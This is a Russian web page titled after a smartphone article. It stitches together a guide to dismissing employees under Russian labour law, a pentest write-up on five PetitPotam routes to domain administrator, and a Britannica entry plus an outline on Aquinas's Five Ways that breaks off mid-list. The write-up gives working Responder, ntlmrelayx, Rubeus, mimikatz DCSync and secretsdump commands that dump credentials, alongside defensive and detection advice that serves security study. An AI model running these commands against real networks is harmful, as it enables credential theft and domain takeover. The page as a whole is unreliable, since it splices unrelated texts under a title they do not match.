Пять способов: Пять способов использования старого смартфона, если вы купили новый

Содержание

5 способов уволить сотрудника

Что делать, иногда нужно уволить сотрудника, который не уходит сам. Разбираем популярные способы увольнения по Трудовому кодексу РФ.

В чём опасность увольнения без согласия работника

Бывает, работник не хочет писать заявление по собственному желанию и расставаться мирно. Предпринимателю приходится искать статью для увольнения. Запись в трудовой книжке становится клеймом, с которым сложно найти новую работу. И человек посвящает себя разборкам: находит юриста, жалуется в трудовую инспекцию, прокуратуру и суд.

При увольнении с ошибками работника вернут. Работодатель выплатит зарплату за время спора по ст. 234 ТК РФ и штраф государству по ст. 5.27 КоАП РФ. А за увольнение беременной и женщины с детьми до трёх лет заводят уголовное дело по ст. 145 УК РФ.

Безопаснее всего сделать так. Уволить по реальному поводу и правильно оформить кадровые документы.

Некоторых работников увольнять нельзя

Уволить без заявления по собственному желанию можно не всех. Есть работники с иммунитетом.

Беременных увольнять запрещено — ст. 261 ТК РФ. Даже за прогулы, хамство и недостачу в кассе. Исключение — когда фирма закрывается.

Матерей с детьми до трёх лет, а без мужа — до четырнадцати, нельзя сокращать и увольнять за низкую квалификацию. Полный список семейных работников под защитой — в ст. 261 ТК РФ.

На больничном и в отпуске сотрудника не увольняют. Надо ждать выхода на работу. Отпуском считаются не только четыре недели в году, но и декрет, дни без содержания и выход на сессию. 

Несовершеннолетнего увольняют только с согласия трудинспекции или комиссии по делам несовершеннолетних в своём городе — ст. 269 ТК РФ. Если чиновники против, человек работает дальше.

Новым ИП — год Эльбы в подарок

Год онлайн-бухгалтерии на тарифе Премиум для ИП младше 3 месяцев

Попробовать бесплатно

1.

По соглашению сторон — ст. 78 ТК РФ

По соглашению сторон — когда работник и работодатель договорились разойтись. 

Можно предложить работнику соглашение с взаимной выгодой. Например, работодатель платит небольшую премию, а работник сдаёт документы коллегам и уже завтра не приходит. 

Способ удобный: избавляет от сотрудника без лишних бумаг и процедур. От подписанного соглашения нельзя отказаться, в отличие от заявления по собственному желанию (там две недели, чтобы передумать). Но риски всё же есть.

Суд отменит соглашение, если работник скажет, что на него давили. Приведёт свидетелей или покажет переписку. Поэтому предлагать условия лучше письменно. 

2. За неисполнение трудовых обязанностей и дисциплину — п. 5 ст. 81 ТК РФ

Каждый работник обязан выполнять трудовые обязанности и не нарушать дисциплину. 

Обязанности написаны в трудовом договоре и должностной инструкции. Например, продавец консультирует клиентов, принимает деньги, отправляет заявки поставщикам.  

Дисциплина — это рабочее время, дресс-код, правила общения с коллегами. Про дисциплину сказано в трудовом договоре и правилах внутреннего распорядка (если принимали).

За нарушение обязанностей и дисциплины делают замечание или выговор. Продавец не отбил чек — выговор, опоздал на смену — замечание. Это называется дисциплинарным взысканием по ст. 192 ТК РФ.

Когда выговоров и замечаний накопилось два или больше, работника можно уволить. Основание называется «за неоднократное неисполнение работником без уважительных причин трудовых обязанностей». Подойдёт для увольнения за плохую работу, грубость с клиентами, опоздания.

Для увольнения надо минимум два раза в течение года оформить дисциплинарное взыскание. Делается это по ст. 193 ТК РФ: 

  1. Зафиксировать проступок работника — докладной запиской об опоздании, актом о невыполнении обязанности.
  2. Взять с работника объяснение, почему так вышло. Требование вручают под подпись. Потом ждут два дня, если человек молчит, делают акт об отказе.
  3. Вынести приказ о выговоре или замечании. 

Приказ делают не позднее месяца с обнаружения проступка и шести месяцев с совершения. Время отпуска и больничного не считают. С приказом знакомят работника в течение трёх дней. Бунтует — делают акт об отказе. Если нарушить сроки, взыскание не сработает.

Пример: руководитель собрал косяки работника и уволил

Штатный разработчик не сдал в срок работу и сорвал сдачу проекта всего отдела. Ему оформили замечание. Потом ушёл с работы раньше на 40 минут — выговор.

Фирма собрала два приказа и уволила за неисполнение обязанностей. Оспорить не получилось — дело № 33-19370.

Статья про ответственность работника

3. За прогул и алкоголь — п. 6 ст. 81 ТК РФ

Нарушения дисциплины бывают грубые. За одно грубое можно сразу увольнять. Это тоже дисциплинарное взыскание. Но копить предыдущие не надо.

Все грубые нарушения записаны в п.  6 ст. 81 ТК РФ. Среди них прогул и алкогольное или наркотическое опьянение на работе.

Грубое нарушение оформляют по бумагам также как простое. Докладная записка или акт, объяснение, приказ об увольнении не позднее месяца с обнаружения.

Прогул

Прогул — когда человек не пришёл на работу или отсутствовал четыре часа подряд.

У прогула нет уважительной причины: болезнь, ДТП, смерть родственника. Отгулы и отпуска без спроса руководителя тоже считаются прогулами. Это пояснено в п. 39 Постановление Пленума ВС РФ от 17.03.2004 № 2.  

Пример прогула:

Специалист в банке накануне рабочего дня в 23:30 часов через сообщение в WhatsApp попросила у директора отгул. Молчание посчитала согласием. Когда вышла на работу, ей оформили прогул и уволили.

Специалист обжаловала прогул, но суд не вернул работу. 

Отгул не одобрили — значит, это прогул. Есть акт об отсутствии на рабочем месте и служебная записка директора, объяснение, приказ. В сроки уложились. Увольнение за прогул справедливо и оформлено правильно — дело 33-12011/2019.

Опьянение

Алкогольное и наркотическое опьянение надо доказать. 

Подходит акт со свидетелями. Суд поверил свидетелям, что продавец в магазине стояла за прилавком пьяная — дело № 33-5383/10

Вариант сильнее — алкотестер или заключение врача. Например, алкотестер помог в споре об увольнении водителя троллейбуса — дело № 2-3639/2018. Есть возможность — сделайте тест или позовите врача.

4. За утрату доверия в работе с деньгами и товарами — п. 7 ст. 81 ТК РФ

Сотрудники отвечают за деньги и товары, с которыми работают. За недостачу, обсчёт клиентов, продажу без чеков и откровенно воровство можно уволить. 

Недостачу оформляют инвентаризацией, другие нарушения — актами, докладными записками. С работника берут объяснение и увольняют не позднее месяца после обнаружения проступка.

Как правильно оформить договоры полной материальной ответственности

5. Сокращение штата — п. 2 ст. 81

Суть сокращения штата следующая. Работодатель говорит: «Мне больше не нужно столько работников. Тебя и тебя я уволю. Даю время на поиск работы, помогаю деньгами и увольняю». 

Сокращение подходит, когда в фирме стало меньше заказов. Например, в гостинице снизился поток туристов и сократили одну должность администратора — дело № 33-1805/2013.

Сколько держать работников — дело предпринимателя. Захотел и сократил. Так сказано в Определении Конституционного Суда РФ от 24.09.2012 № 1690-О. 

Процедура сокращения такая. Сотруднику вручают персональное уведомление о сокращении, и он работает ещё два месяца за зарплату по ст. 180 ТК РФ. Через два месяца издают приказ об увольнении. До сокращения человеку предлагают другие вакансии в фирме, если есть. 

Уволенному платят два средних заработка по ст. 178 ТК РФ. Если через месяц он не найдёт работу и принесёт справку из центра занятости, добавляют ещё одну. Если сотрудник согласен, увольняют раньше с повышенной зарплатой.

Кто хуже работает, того сокращают первым. Например, у бармена выручка меньше, чем у сменщика — его увольняют. Если все работают одинаково, увольняют работника без иждивенцев. Подробно про выбор людей под сокращение написано в ст. 179 ТК РФ.

Другие основания увольнения

Мы рассказали про увольнения, которые встречаются часто в любом бизнесе. Но оснований в Трудовом кодексе гораздо больше. Вот список редких, но тоже реальных статей для увольнения:

— Ликвидация фирмы, закрытие ИП — п. 1 ст. 81 ТК РФ;

— Работник подделал диплом или трудовую книжку, когда устраивался — п. 11 ст. 81, ст. 84 ТК РФ;

— Провалил проверку знаний — п. 3 ст. 81 ТК РФ;

— Работника забирают в армию или отобрали водительские права, а он водитель — ст. 83 ТК РФ;

— Работник совместитель, а вы подыскали постоянного — ст. 288 ТК РФ.

Как оформить увольнение

В последний день работы оформляют кадровые документы и платят долги по зарплате. Сделайте это, как написано в ст. 84.1 и 140 ТК РФ:

  1. Напечатайте приказ об увольнении с причиной и статьёй из Трудового кодекса. На следующий день после приказа человек уже не работает у вас.
  2. Дайте сотруднику прочитать приказ, попросите расписаться под текстом. Это важный момент, который часто забывают.
  3. Сделайте запись в трудовую книжку.
  4. Выдайте зарплату и компенсацию за отпуск, иначе набегут пени. 
  5. Выдайте трудовую книжку, попросите расписаться за получение.
  6. Скопируйте работнику приказ по его просьбе.

Статья: как делать запись в трудовую книжку

Статья актуальна на 

5 способов, как взять домен с помощью PetitPotam / Хабр

В последнее время почти на каждом проекте по внутреннему пентесту я встречаю уязвимость PetitPotam. И почти всегда она помогает в получении привилегий администратора домена. При наличии доменной учетной записи (в некоторых случаях возможна эксплуатация уязвимости без аутентификации) атакующий может с помощью специально сформированного запроса заставить уязвимый хост выполнить обращение к произвольному хосту с передачей аутентификационных данных. Подробнее можно почитать в статье «Хакера».

В этой статье я расскажу, как использую эту уязвимость и как мне удалось получить привилегии администратора домена пятью разными способами в реальных проектах.

Источник: https://www.youtube.com/watch?v=_O2k2LAlYn0&ab_channel=PETITPOTAMOFFICIEL%F0%9F%87%AB%F0%9F%87%B7

Для атакующего суть уязвимостей одинакова — заставить уязвимый хост выполнить обращение к хосту атакующего. Поэтому вместо PetitPotam могут быть такие уязвимости, как Printer Bug или PrivExchange. Я люблю использовать именно PetitPotam, потому что он чаще всего встречается и в некоторых случаях возможна эксплуатация без аутентификации.

Внимание! Данная статья носит исключительно информационный характер и предназначена для образовательных целей.

Я использую эксплойт с GitHub (https://github.com/topotam/PetitPotam).

Основные параметры: 

  • -u — имя пользователя;

  • -p — пароль пользователя;

  • -d — домен;

  • listener — машина, к которой при эксплуатации обратится уязвимый хост;

  • target — уязвимый хост.

В качестве listener-а чаще всего выступает машина атакующего. Только в одном векторе используется другой хост— я дополнительно это уточню.

Далее в статье фраза «эксплуатируем уязвимость PetitPotam» подразумевает запуск вышеуказанного эксплойта.

python3 PetitPotam.py -u username -p password -d domain.local listener target
Эксплуатация PetitPotam

Понижение аутентификации до NTLMv1

Это самый простой и быстрый способ эксплуатации. В случае, если групповыми политиками хостам разрешена аутентификация по протоколу NTLMv1, атакующий может заставить хост понизить протокол аутентификации до NTLMv1. Протокол NTLMv1 является небезопасным и позволяет осуществить перебор хеша в течение короткого срока для получения NTLM-хеша учетной записи. Это единственный случай, когда я не сочетаю PetitPotam с атакой NTLM Relay.

Как эксплуатировать

Проще всего реализовать эту атаку с помощью утилиты Responder (https://github.com/SpiderLabs/Responder). Сначала необходимо отредактировать конфигурационный файл утилиты Responder. В /etc/responder/Responder.conf устанавливаем следующий challenge (для того, чтобы затем можно было использовать сайт https://crack.sh/get-cracking):

Challenge = 1122334455667788

Затем запускаем responder с параметром lm:

Responder --lm --I eth0 --A

После этого эксплуатируем уязвимость PetitPotam. И получаем NTLMv1-хеш учетной записи компьютера.

Получение NTLMv1-хешей с помощью Responder

Затем идем на сайт https://crack.sh/get-cracking. Вводим хеш в формате NTHASH:hash (пример: NTHASH:CA931F621C07AB571662D7DA05A397FB3B16EB1608D4B7DB), email.

Перебор NTLMv1-хешей на этом сайте бесплатный и обычно занимает меньше минуты, а результат приходит в письме на указанный email. В итоге мы получаем NTLM-хеш учетной записи компьютера. Этот сайт использует радужные таблицы для восстановления NTLM-хэша из NTLMv1. Теоретически вы можете использовать какие-то локальные утилиты (например, rainbowcrack), но для этого необходимо подготовить радужные таблицы. Нет смысла пытаться восстановить пароль по словарям или даже перебором, так как пароли машинных учетных записей генерируются автоматически.  

Пример письма с NTLM-хешом

В случае, если получен NTLM-хеш учетной записи контроллера домена, можно сразу провести атаку DCSync и получить NTLM-хеши всех пользователей домена из базы NTDS. Или можно провести атаку Silver Ticket.

На примере ниже с помощью утилиты secretsdump.py были получены NTLM-хеши из базы NTDS:

secretsdump.py -just-dc -hashes :ntlm-hash -outputfile ntds domain.local/vuln-hostname@dc
Дамп NTDS
Как защититься

В групповых политиках (Computer Configurations -> Policies -> Windows Settings -> Security Settings -> Local Policies -> Security Options and find the policy Network Security: LAN Manager authentication level) на контроллере домена необходимо отключить использование NetNTLMv1, затем включить обязательное использования NTLMv2 и запрет на использование LM либо NTLMv1.

Выпуск сертификата в центре сертификации

Это самый популярный способ использования PetitPotam. В случае, если в инфраструктуре есть центр сертификации (Active Directory Certificate Services), и в нем активированы службы Web Enrollment или Certificate Enrollment Web Service, атакующий может провести атаку NTLM Relay на центр сертификации, получить сертификат хоста и затем с помощью сертификата получить TGT-билет. Далее можно также получить NTLM-хеш учетной записи хоста.

Как эксплуатировать

Для начала необходимо найти центр сертификации. Лучший способ — посмотреть членов группы CERT PUBLISHERS (ИЗДАТЕЛИ СЕРТИФИКАТОВ). Затем проверяем, открыт ли 80-й порт на хостах из этой группы. Запускаем ntlmrelayx.py с relay-атакой на центр сертификации. В некоторых случаях можно изменить используемый шаблон (например, если в центре сертификации не используются стандартные шаблоны).

ntlmrelayx.py -smb2support -t http://CA-IP/certsrv/certfnsh.asp --adcs --template KerberosAuthentication
Запуск ntlmrelayx. py

Затем эксплуатируем PetitPotam, получаем запрос. Ntlmrelayx.py генерирует запрос, отправляет его в центр сертификации. В результате атаки мы получаем сертификат в base64.

Получение сертификата хоста

Декодируем сертификат и запрашиваем с его помощью TGT-билет. Для этого я использую PKINIT tools (https://github.com/dirkjanm/PKINITtools):

сat base64_cert.txt | base64 -d > host_cert.pfx
python3 gettgtpkinit domain.local/vuln-hostname\$ -cert-pfx path-to-cert host.ccache
Декодирование сертификатаПолучение TGT с помощью сертификата

Имея TGT-билет хоста, уже можно выполнять какие-то действия. Но я обычно получаю NTLM-хеш учетной записи хоста с использованием утилиты getnthash.py. В параметре key нужно указать AS-REP encryption key, который был получен при выпуске TGT-билета:

export KRB5CCName=host.ccache
python3 getnthash.py domain.local/vuln-hostname\$ -key as-rep-key
Получение NTLM-хеша пароля хоста

Далее этот NTLM-хеш можно использовать для атак Pass-the-Hash или для атаки Silver Ticket. Я выбрала атаку Silver Ticket: создала TGS-билет для пользователя adm, который является администратором домена и администратором на уязвимом хосте. С помощью полученного билета я сдампила учетные данные из памяти процесса lsass.exe и получила пароль администратора домена в открытом виде:

ticketer.py -nthash hash -domain-sid sid -domain doman.local -spn cifs/vuln-hostname.domain.local username
export KRB5CCNAME=path-to-ccache
crackmapexec smb vuln-hostname -k -u username -M lsassy
Получение Silver TicketЭкспорт TGSДамп памяти lsass.exe
Как защититься
  1. Если не используете службы Certificate Authority Web Enrollment и Certificate Enrollment Web Service, то отключить их.

  2. Включить Extended Protection for Authentication (EPA) и установить параметр Require TLS.

  3. Запретить NTLM на всех центрах сертификации в домене с помощью групповых политик.

  4. Отключить NTLM в IIS на хосте с ролью Центра сертификации.

Подробная инструкция: https://support. microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429

Неограниченное делегирование Kerberos

Неограниченное делегирование — это привилегия, которая может быть назначена учетной записи компьютера или пользователя. Данная привилегия позволяет этой учетной записи проходить аутентификацию в сервисах от имени других учетных записей.

Что это дает атакующему?

Если у вас есть привилегии локального администратора на хосте с неограниченным делегированием, вы можете получить TGT-билеты пользователей, которые проходят аутентификацию на этом хосте, и переиспользовать их до истечения срока действия.

Как эксплуатировать

Для начала нам нужен хост с неограниченным делегированием, на котором у нас есть привилегии локального администратора. Для поиска хостов с неограниченным делегированием, которые не являются контроллерами домена, я использую кастомный запрос Bloodhound. Этот запрос я взяла из чужого репозитория (https://github.com/hausec/Bloodhound-Custom-Queries):

{
            "name": "Find computers that allow unconstrained delegation that aren’t domain controllers.",
            "queryList": [{
                "final": true,
                "query": "MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2:Computer {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2"
            }]
        },

Для эксплуатации нам потребуется Rubeus.exe. Подключаемся к хосту (я подключаюсь по RDP). Запускаем от имени SYSTEM Rubeus.exe в режиме монитора:

Rubeus.exe /monitorinterval:1 /targetuser:hostname$ /nowrap

Эксплуатируем PetitPotam. В качестве listener-а указываем dns-имя хоста с неограниченным делегированием, на котором мы запустили Rubeus. В Rubeus получаем TGT-билет уязвимого хоста в base64. Можно декодировать его и использовать на Kali Linux. А можно продолжить работать на этом же хосте, как сделала я.

ПолучениеTGT хоста с помощью Rubeus

Проводим атаку Pass-the-Ticket. Сначала декодируем base64 и записываем TGT в файл. А затем используем mimikatz.exe для атаки. Так как в моем случае уязвимым был контроллер домена, после атаки Pass-the-Ticket я провела атаку DCSync и получила NTLM-хеш администратора домена, который можно использовать для Pass-the-Hash:

[IO.File]::WriteAllBytes(“ticket-filename.kirbi”:, [Convert]::FromBase64String(“base64-ticket”))
Mimikatz.exe
kerberos::ptt ticket-filename.kirbi
lsadump::dcsync /user:adin_username
Декодирование TGTАтаки Pass-the-Ticket и DCSync
Как защититься

Провести инвентаризацию всех хостов с неограниченным делегированием. В случае, если эта привилегия не нужна, отключить ее.

Ограниченное делегирование Kerberos на основе ресурсов

При делегировании Kerberos на основе ресурсов компьютеры (ресурсы) указывают, кому они доверяют и кто может делегировать им аутентификацию. Учетные записи, которым доверяют компьютеры, указаны в атрибуте msDS-AllowedToActOnBehalfOfOtherIdentity. Если атакующий добавит в этот атрибут имя скомпрометированного компьютера (или любого компьютера, от имени которого он может пройти аутентификацию), то он сможет притвориться для целевого хоста кем угодно — например, администратором.

Как эксплуатировать

Для эксплуатации должна быть возможность проведения атаки NTLM Relay на LDAPS-сервер. Чаще всего я добавляю параметр remove-mic для эксплуатации уязвимости CVE-2019-1040.

Запускаем ntlmrelayx.py:

ntlmrelayx.py -t ldaps://dc-ip --remove-mic --delegate-access

Затем эксплуатируем PetitPotam. Если атака была успешной, мы получим имя и пароль только что созданной учетной записи компьютера.

Создание учетки компьютера и предоставление ей привилегий

С помощью этой учетной записи запрашиваем TGS для любого пользователя. Я запрашивала для администратора домена. Что можно сделать, имея TGS, я писала выше.

getST.py -spn host/vuln-host -impersomaite admin-name ‘domain.local/new-hostname$’
Запрос TGS

Так как в моем случае уязвим был контроллер домена, я получила NTLM-хеши всех учетных записей из базы NTDS:

export KRB5CCNAME=admin-name.ccache
secretsdump.py -just-dc -k -no-pass -outputfile ntds dc
Дамп NTDS
Как защититься
  1. Включить обязательную подпись LDAP.

  2. Для усложнения атаки запретить непривилегированным пользователям и учетным записям компьютеров добавлять новые устройства в домен.

  3. Установить обновление безопасности от Microsoft, если оно не установлено (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-1040).

Атака NTLM Relay на SMB

Бывает такое, что учетная запись компьютера является локальным администратором на другом компьютере. Например, я несколько раз встречала, что члены группы EXCHANGE TRUSTED SUBSYSTEM являются локальными администраторами на серверах Exchange. В этом случае PetitPotam можно сочетать с атакой NTLM Relay на SMB — отсутствие подписи на SMB встречается довольно часто.

Как эксплуатировать

Сначала нужно найти хосты, которые являются администраторами на других хостах. Для этого я использую кастомный запрос в Bloodhound и проверяю привилегии группы EXCHANGE TRUSTED SUBSYSTEM. Я не эксперт в кастомных запросах Bloodhound, поэтому он не идеальный. Если у вас есть идеи, как его улучшить, напишите, пожалуйста, в комментариях.

{
            "name": "List all computers which are local admins on other computer",
            "queryList": [{
                "final": true,
                "query": "MATCH p=(m:Computer)-[r:AdminTo]->(n:Computer) RETURN p"
            }]
        }
Проверка привилегий группы Exchange Trusted SubsystemСписок членов группы Exchange Trusted Subsystem

Если нашлось несколько хостов, на которых выбранный хост или группа являются администратором, то создаем файл со списком этих хостов. Затем запускаем ntlmrelayx.py:

ntlmrelayx.py -tf exchanges-list.txt -socks

После эксплуатации PetitPotam на хосте, который является администратором (в моем случае это EXCH03), получаем SMB-сессии от имени администратора.

SMB-сессии

Далее редактируем конфигурационный файл /etc/proxychains. В списке должен быть только один прокси-сервер:

socks4 127.0.0.1 1080

Имея SMB-сессию администратора, можно использовать smbclient.py, crackmapexec и множество других утилит. 

Подробнее про механизм можно почитать здесь (https://www.secureauth.com/blog/playing-with-relayed-credentials/). Я предлагаю выгрузить учетные данные из реестра (SAM и LSA). Для этого используем secretsdump.py:

proxychains secretsdump.py -no-pass ‘domain.local/victim-ip$’@hostname
Дамп учетных данных из реестраПолучение пароля учетки из реестра

В результате мы получаем NTLM-хеши локальных пользователей, в том числе локального администратора, которые можно использовать для атаки Pass-the-hash. Еще мы можем получить DCC2-хеши доменных пользователей, которые ранее аутентифицировались на хосте. Их можно побрутить. Еще иногда можно получить в открытом виде пароли пользователей, от имени которых запускаются службы. Это как раз мой случай — пользователь VeeamBackup оказался администратором домена.

Как защититься
  1. Включить подпись на SMB.

  2. Провести инвентаризацию и удалить лишние привилегии.

Общие рекомендации для устранения PetitPotam

Для предотвращения эксплуатации PetitPotam необходимо:

  1. Установить обновления безопасности от Microsoft (https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942, https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26925).

  2. Применить RPC-фильтры, как описано в статье https://kb.cert.org/vuls/id/405600.

  3. Заблокировать исходящий трафик на 445-й порт от контроллеров домена к произвольным узлам.  

Как детектировать PetitPotam

Детектировать следы эксплуатации PetitPotam можно несколькими способами.

1. После успешной эксплуатации уязвимости PetitPotam генерируется событие успешного логина (4624 в журнале Security) со специфичными параметрами.

Данные параметры могут использоваться:

Event ID = 4624

  • User: ANONYMOUS LOGON

  • Authentication Package: NTLM*

  • Elevated Token: %%1842

2. В процессе эксплуатации PetitPotam возникает принудительная проверка подлинности, в результате чего генерируется событие доступа к общей папке IPC (5145 в журнале Security):

Event ID = 5145

Обратите внимание, что для генерации события 5145 должны быть включены расширенные настройки аудита:

3. Можно детектировать факт успешной эксплуатации уязвимости PetitPotam, когда злоумышленник пробует запросить TGT после получения сертификата (вектор описан в пункте «Выпуск сертификата в центре сертификации»). Дело в том, что при запросе TGT атакующий будет обращаться к контроллеру домена со своей машины под машинной УЗ контроллера домена. Таким образом в событии запроса TGT (событие 4768 в журнале Security) появится IP-адрес атакующего.

Обратите внимание, что для такого детектирования PetitPotam необходимо выполнить следующие подготовительные действия:

  • создать список контроллеров домена;

  • создать список IP-адресов контроллеров домена;

  • настроить политику расширенного аудита для генерации событий 4768: Account Logon > Kerberos Authentication Service > Success/Failure.

Event ID = 4768

  • Account Name: *$ (машинная УЗ DC)

  • Service Name = krbtgt

  • Client Address = NOT DC IP address

Сама по себе уязвимость PetitPotam не является критической, однако в сочетании с недостатками конфигурации или особенностями инфраструктуры может быть очень опасной. Конечно, мне как пентестеру нравится, что почти в любой компании можно получить привилегии администратора домена с помощью этой уязвимости, но я рекомендую принять меры для ее устранения. Ведь наша цель — повысить уровень информационной безопасности.

Источники изображений в этом посте: «Инфосистемы Джет»

Ирина Беляева

старший консультант по информационной безопасности Центра информационной безопасности «Инфосистемы Джет»

Александр Ахремчик

ведущий аналитик центра мониторинга и реагирования на инциденты ИБ Jet CSIRT «Инфосистемы Джет»

Пять Путей | Определение и аргументы

Андреа да Фиренце: Триумф св. Фомы Аквинского

Просмотреть все медиа

Связанные темы:
философия религии

Просмотреть весь связанный контент →

Пять Путей , латынь Quinquae Viae , в философии религии пять аргументов, предложенных св. Фомой Аквинским (1224/25–1274) в качестве демонстрации существования Бога.

Фома Аквинский разработал теологическую систему, которая синтезировала западно-христианское (и преимущественно римско-католическое) богословие с философией древнегреческого мыслителя Аристотеля (384–322 гг. В своей книге Summa Theologica , которую он намеревался использовать в качестве учебника для студентов-богословов, Аквинский разработал пять аргументов в пользу существования Бога, известных как Пять Путей, которые впоследствии оказались очень влиятельными. В то время как большая часть системы Фомы Аквинского посвящена особому откровению — учению о воплощении Слова Божьего в Иисусе Христе, — Пять Путей являются примерами естественного богословия. Другими словами, они представляют собой согласованную попытку разглядеть божественную истину в порядке естественного мира.

Первые три аргумента Аквината — от движения, от причинности и от случайности — являются типами того, что называется космологическим аргументом в пользу божественного существования. Каждый начинается с общей истины о природных явлениях и переходит к существованию конечного творческого источника вселенной. В каждом случае Аквинский отождествляет этот источник с Богом.

Первое доказательство существования Бога у Аквината — это аргумент от движения. Он исходил из наблюдения Аристотеля, что каждая движущаяся вещь во вселенной приводится в движение чем-то другим. Аристотель полагал, что последовательность движущих сил должна была начаться с первого или первичного двигателя, который сам не был перемещен или на который не воздействовал какой-либо другой агент. Аристотель иногда называл этот первичный двигатель «Богом». Аквинат понимал его как Бога христианства.

Второй из Пяти Путей, аргумент причинно-следственной связи, основывается на аристотелевском понятии действующей причины, сущности или события, ответственного за изменение конкретной вещи. Аристотель приводит в качестве примеров человека, принявшего решение, отца, зачавшего ребенка, и скульптора, вырезающего статую. Так как всякая действующая причина сама должна иметь действующую причину и поскольку не может быть бесконечной цепи действующих причин, то должна быть неизменная первопричина всех изменений, происходящих в мире, и эта первопричина есть Бог.

Третье доказательство существования Бога у Аквината — это аргумент случайности, который он выдвигает, проводя различие между возможными и необходимыми существами. Возможные существа — это те, которые способны существовать и не существовать. Многие природные существа, например, возможны, потому что они подвержены порождению и разрушению. Если существо способно не существовать, то есть время, когда оно не существует. Следовательно, если бы всякое существо было возможно, то было бы время, когда ничего не существовало. Но тогда не было бы ничего существующего сейчас, потому что никакое существо не может возникнуть иначе, как через существо, которое уже существует. Следовательно, должно быть хотя бы одно необходимое существо — существо, которое не способно не существовать. Кроме того, всякое необходимое существо либо необходимо само по себе, либо становится необходимым другим необходимым существом. Но как не может быть бесконечной цепи действующих причин, так не может быть бесконечной цепи необходимых существ, необходимость которых вызвана другим необходимым существом. Скорее должно быть существо, необходимое само по себе, и это существо есть Бог.

Оформите подписку Britannica Premium и получите доступ к эксклюзивному контенту. Подписаться сейчас

Четвертый аргумент Фомы Аквинского состоит в том, что он исходит из степеней совершенства. Все вещи демонстрируют большую или меньшую степень совершенства. Следовательно, должно существовать высшее совершенство, к которому все несовершенные существа приближаются, но не достигают его. В системе Фомы Аквинского этим первостепенным совершенством является Бог.

Пятый и последний способ Аквината продемонстрировать существование Бога — это аргумент от конечных причин или целей в природе ( см. телеология). Опять же, он опирался на Аристотеля, который считал, что каждая вещь имеет свою собственную естественную цель или цель. Однако некоторым вещам, таким как естественные тела, не хватает разума, и поэтому они неспособны направлять себя к своим целям. Следовательно, ими должно руководить какое-то разумное и знающее существо, которым является Бог.

Мэтт Стефон

Фома Аквинский

Фома Аквинский

Пять способов доказать существование Бога Фомы Аквинского

с http://guava. phil.lehigh.edu/aquinas/fiveways.html

1. Первый путь: движение.
2. Второй путь: действующая причина.
3. Третий путь: возможность и необходимость.
4. Четвертый путь: градация.
5. Пятый путь: дизайн.

Общие замечания:

* Более поздние мыслители классифицировали все пять способов как варианты космологического аргумента в пользу существования Бога. Космология — это изучение происхождения и строения Вселенной; каждый из пяти способов является отражением условий, которые должны были иметь место для того, чтобы возникла Вселенная или некоторая наблюдаемая особенность Вселенной.
* Четвертый способ выглядит, на первый взгляд, как вариация онтологического аргумента. Но, как и остальные четыре способа, это апостериорно. Аргумент Ансельма априорный. Его критикует Фома Аквинский в Summa I.II.1 (стр. 417). Далее, говорит Фома Аквинский (I.II.2), любое доказательство существования Бога должно исходить из известных нам действий Бога; это должно быть апостериорно.
* Пятый способ напоминает версию телеологического аргумента или аргумента от замысла. Хотя канонический аргумент от замысла относится к гораздо более позднему времени (17 век), Фома Аквинский не может возражать против такой идентификации. Телеологический аргумент, в конце концов, является апостериорным.

 

Первый путь: движение

1. Все тела либо потенциально движутся, либо действительно движутся.
2. «Но ничто не может быть сведено от возможности к действительности, кроме чего-то, находящегося в состоянии действительности» (419).
3. Ничто не может быть одновременно и в действительности, и в возможности в одном и том же отношении.
4. Следовательно, ничего не может быть одновременно и в действительности, и в возможности по отношению к движению
. 5. Следовательно, ничто не может двигаться само по себе; оно должно быть приведено в движение чем-то другим.
6. Если бы не было «перводвигателя, движимого никем другим», не было бы и движения.
7. Но есть движение.
8. Следовательно, есть перводвигатель, Бог.


Второй путь: действующая причина

1. Ничто не является действующей причиной самого себя.
2. Если А является действующей причиной В, то если А отсутствует, то и В.
3. Действующие причины упорядочены от первой причины через промежуточную причину (причины) к окончательному следствию.
4. Согласно (2) и (3), если нет первопричины, не может быть и конечного следствия.
5. Но есть эффекты.
6. Следовательно, у всего должна быть первопричина: Бог.

 

Третий путь: возможность и необходимость

1. «Мы находим в природе то, что возможно быть и не быть:» случайные существа.
2. Все либо необходимо, либо условно.
3. Предположим, что все условно.
4. «Невозможно, чтобы [условные существа] всегда существовали, ибо то, что не может быть в какое-то время, не существует».
5. Следовательно, по (3) и (4) в свое время ничего не было.
6. «То, чего нет, начинает существовать только через нечто уже существующее».
7. Следовательно, по (5) и (6) теперь ничего нет.
8. А ведь что-то есть!
9. Следовательно, (3) неверно.
10. Следовательно, по (2) существует необходимое существо: Бог.

 

Четвертый путь: градация

1. В вещах существует градация: одни лучше (горячее, холоднее и т. д.), чем другие.
2. Вещи являются Х пропорционально тому, насколько они похожи на то, что наиболее Х.
3. Следовательно, если нет ничего наиболее Х, не может быть ничего хорошего.
4. Из этого следует, что если что-то хорошо, то должно быть что-то самое хорошее.
5. «Поэтому также должно быть нечто, что является для всех существ причиной их бытия, благости и всякого другого совершенства; и это мы называем Богом» (420).

 

Пятый путь: Дизайн

1. Мы наблюдаем, что естественные тела действуют в направлении цели.

Пять способов: Пять способов использования старого смартфона, если вы купили новый

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Пролистать наверх